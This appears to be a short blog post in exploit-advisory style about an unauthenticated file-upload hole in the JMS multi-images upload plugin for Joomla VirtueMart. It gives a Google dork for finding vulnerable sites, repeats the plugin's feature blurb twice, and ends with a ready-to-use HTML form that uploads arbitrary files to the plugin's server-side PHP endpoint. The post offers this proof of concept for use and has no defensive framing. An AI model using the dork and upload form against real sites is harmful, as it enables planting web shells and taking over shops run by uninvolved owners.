#- Author: AnoaGhost
#- Date: 27/05/2016
#- Developer : JMS
#- Link Download : extensions. joomla. org/extension/jms-multi-images-upload-for-virtuemart
#- Google Dork: inurl:"/system/jms_multiupload_virtuemart/"
#- Fixed in Version : -
#- Tested on : windows
=======================================================
-- Proof Of Concept --
Description :
Virtuemart is a good shopping component but when you have a big store, each product has so much images, time for upload images for products will be much, sometimes you feel tired because have to upload one image-saving, then upload one image – saving….
Featured of plugin:
- Browse multi images one time and upload them for product.
- Ajax upload images.
- Automatically create thumbnails for those images.
- No hack core Virtuemart.
- Browse multi images one time and upload them for product.
- Ajax upload images.
- Automatically create thumbnails for those images.
- No hack core Virtuemart.
Vulnerability : site/plugins/system/jms_multiupload_virtuemart/assets/server/php/
CSRF
<form method="POST" action="3xploi7.blogspot/plugins/system/jms_multiupload_virtuemart/assets/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>3xploi7ed!</button>
</form>
0 komentar:
Posting Komentar